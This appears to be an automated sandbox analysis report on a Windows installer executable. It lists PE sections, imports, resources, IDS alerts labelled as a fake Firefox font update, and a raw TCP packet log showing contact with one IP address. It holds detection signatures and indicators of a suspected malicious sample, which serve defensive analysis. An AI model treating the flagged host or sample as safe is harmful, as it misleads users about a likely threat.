                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x676500x54.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x676a40x18.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x670300x40.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x4b0000x3e0.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x682340x100.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                            Sections

                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x10000x499370x49a002319c0baa707bb66cc0bc08c55a13d8cFalse0.5314688561120543data6.570006046413636IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rdata0x4b0000x1ed600x1ee008ad6c4e18165c6d8ccdc97bab683438dFalse0.3136386639676113data5.114228301263695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .data0x6a0000x17300xa0000fde973df27dc2d36084e16d6dddbdfFalse0.274609375firmware 2005 v9319 (revision 0) N\346@\273\261\031\277D V2, 0 bytes or less, UNKNOWN2 0xffffffff, at 0 0 bytes , at 0 0 bytes , at 0x20a146003.1526594027632213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                            .wixburn0x6c0000x380x200e9ca1c09062508c3b92e35754e60f8d0False0.107421875data0.5734966016060967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rsrc0x6d0000x3a240x3c0088921ee6f52b1477449352c993b3919cFalse0.3304036458333333data5.550645858532838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .reloc0x710000x3dfc0x3e00dd2c47fa48872886af4c9a2e5bd90cccFalse0.8097278225806451data6.794335469567533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                            Resources

                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                            RT_ICON0x6d1780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.43185920577617326
                                                                                                                                                            RT_MESSAGETABLE0x6da200x2840dataEnglishUnited States0.28823757763975155
                                                                                                                                                            RT_GROUP_ICON0x702600x14dataEnglishUnited States1.15
                                                                                                                                                            RT_VERSION0x702740x2dcdataEnglishUnited States0.4781420765027322
                                                                                                                                                            RT_MANIFEST0x705500x4d2XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminatorsEnglishUnited States0.47568881685575365

                                                                                                                                                            Imports

                                                                                                                                                            DLLImport
                                                                                                                                                            ADVAPI32.dllRegCloseKey, RegOpenKeyExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegQueryValueExW, RegDeleteValueW, CloseEventLog, OpenEventLogW, ReportEventW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, ControlService, OpenSCManagerW, OpenServiceW, QueryServiceStatus, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, QueryServiceConfigW
                                                                                                                                                            USER32.dllPeekMessageW, PostMessageW, IsWindow, WaitForInputIdle, PostQuitMessage, GetMessageW, TranslateMessage, MsgWaitForMultipleObjects, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, CreateWindowExW, UnregisterClassW, RegisterClassW, DefWindowProcW, DispatchMessageW
                                                                                                                                                            OLEAUT32.dllVariantInit, SysAllocString, VariantClear, SysFreeString
                                                                                                                                                            GDI32.dllDeleteDC, DeleteObject, SelectObject, StretchBlt, GetObjectW, CreateCompatibleDC
                                                                                                                                                            SHELL32.dllCommandLineToArgvW, SHGetFolderPathW, ShellExecuteExW
                                                                                                                                                            ole32.dllCoUninitialize, CoInitializeEx, CoInitialize, StringFromGUID2, CoCreateInstance, CoTaskMemFree, CLSIDFromProgID, CoInitializeSecurity
                                                                                                                                                            KERNEL32.dllGetCommandLineA, GetCPInfo, GetOEMCP, CloseHandle, CreateFileW, GetProcAddress, LocalFree, HeapSetInformation, GetLastError, GetModuleHandleW, FormatMessageW, lstrlenA, lstrlenW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, Sleep, GetLocalTime, GetModuleFileNameW, ExpandEnvironmentStringsW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, CompareStringW, GetCurrentProcessId, WriteFile, SetFilePointer, LoadLibraryW, GetSystemDirectoryW, CreateFileA, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetProcessHeap, FindClose, GetCommandLineW, GetCurrentDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, GetCurrentProcess, GetCurrentThreadId, InitializeCriticalSection, DeleteCriticalSection, ReleaseMutex, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CreateProcessW, GetVersionExW, VerSetConditionMask, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, GetNativeSystemInfo, GetModuleHandleExW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetEnvironmentStringsW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetUserDefaultUILanguage, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, DuplicateHandle, InterlockedExchange, InterlockedCompareExchange, LoadLibraryExW, CreateEventW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, SetEvent, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CompareStringA, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, GetThreadLocale, IsValidCodePage, FindFirstFileExW, FreeEnvironmentStringsW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DecodePointer, WriteConsoleW, GetModuleHandleA, GlobalAlloc, GlobalFree, GetFileSizeEx, CopyFileW, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetSystemInfo, VirtualProtect, VirtualQuery, GetComputerNameW, SetCurrentDirectoryW, GetFileType, GetACP, ExitProcess, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, LoadLibraryExA
                                                                                                                                                            RPCRT4.dllUuidCreate

                                                                                                                                                            Possible Origin

                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                            EnglishUnited States

                                                                                                                                                            Network Behavior

                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                            2025-01-06T23:04:46.839981+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.80.52443TCP
                                                                                                                                                            2025-01-06T23:04:48.051667+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.80.52443TCP
                                                                                                                                                            2025-01-06T23:04:49.124251+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.80.52443TCP
                                                                                                                                                            2025-01-06T23:05:14.230605+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449911104.21.80.52443TCP
                                                                                                                                                            2025-01-06T23:05:15.603604+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449919104.21.80.52443TCP
                                                                                                                                                            2025-01-06T23:05:16.502609+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449929104.21.80.52443TCP
                                                                                                                                                            2025-01-06T23:05:17.372518+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449938104.21.80.52443TCP
                                                                                                                                                            2025-01-06T23:05:18.210322+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449946104.21.80.52443TCP
                                                                                                                                                            2025-01-06T23:05:19.374062+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449953104.21.80.52443TCP
                                                                                                                                                            2025-01-06T23:05:19.505451+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449954104.21.80.52443TCP
                                                                                                                                                            2025-01-06T23:05:20.486339+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449960104.21.80.52443TCP
                                                                                                                                                            2025-01-06T23:05:20.681592+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449966104.21.80.52443TCP

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jan 6, 2025 23:04:02.077178001 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                            Jan 6, 2025 23:04:46.357510090 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:46.357557058 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:46.357636929 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:46.358681917 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:46.358699083 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:46.839904070 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:46.839981079 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:46.845360041 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:46.845370054 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:46.845578909 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:46.889775991 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:46.891231060 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:46.891251087 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:46.891258001 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305699110 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305740118 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305778980 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305810928 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305844069 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305865049 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.305877924 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305898905 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.305921078 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305952072 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305984974 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305999041 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.306006908 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.306035995 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.306056023 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.306061983 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.306149006 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.389642000 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396153927 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396183968 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396305084 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.396315098 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396420956 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396440983 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.396449089 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396496058 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396524906 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396544933 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.396552086 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396574974 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.397340059 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.397371054 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.397409916 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.397556067 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.397563934 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.398068905 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.398108006 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.398127079 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.398133993 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.398169041 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.398277998 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.398284912 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.398473978 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.398952007 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.399008989 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.399034023 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.399058104 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.399065018 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.399141073 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.475261927 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487147093 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487179995 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487207890 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487236977 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487301111 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487338066 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.487349033 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487400055 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.488094091 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.488478899 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.488507986 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.488528967 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.488534927 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.488559008 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.488603115 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.493460894 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.493784904 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.493784904 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.493794918 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.493803024 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.563163042 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.563200951 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.563355923 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.563591957 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.563607931 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.051574945 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.051666975 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.104712963 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.104732990 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.104955912 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.112519026 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.112541914 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.112549067 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.413940907 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.414031029 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.414093971 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.420449972 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.420464993 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.420475960 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.420480013 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.632678986 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.632723093 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.632807970 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.633398056 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.633410931 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.124183893 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.124250889 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.125446081 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.125453949 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.125680923 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.126553059 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.126568079 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.126573086 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.464968920 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.465027094 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.465131998 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.465270042 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.465281963 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.465300083 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.465307951 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:02.587474108 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:02.587502003 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:02.587548018 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:02.587836027 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:02.587850094 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.367721081 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.371351957 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.371366978 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.371787071 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.371800900 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.371913910 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.371922016 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.372025013 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.372622967 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.376064062 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.376135111 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.376410961 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.376419067 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.475147009 CET49786443192.168.2.418.244.18.32
                                                                                                                                                            Jan 6, 2025 23:05:03.475164890 CET4434978618.244.18.32192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.475239992 CET49786443192.168.2.418.244.18.32
                                                                                                                                                            Jan 6, 2025 23:05:03.475924969 CET49786443192.168.2.418.244.18.32
                                                                                                                                                            Jan 6, 2025 23:05:03.475938082 CET4434978618.244.18.32192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.531124115 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.646924019 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.646974087 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.647011995 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.647039890 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.647068024 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.647085905 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.647114038 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.652173996 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.652249098 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.652256966 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.658302069 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.658375978 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.658382893 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.664586067 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.664779902 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.664787054 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.670912027 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.671055079 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.671061993 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.677167892 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.678360939 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.678368092 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.683355093 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.683474064 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.683480978 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.733401060 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.733438015 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.733468056 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.733470917 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.733479977 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.733850956 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.738236904 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.738368034 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.738377094 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.744532108 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.745183945 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.745192051 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.750833988 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.750943899 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.750951052 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.757016897 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.757157087 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.757164001 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.763336897 CET44349768142.250.186.97192.168.2.4
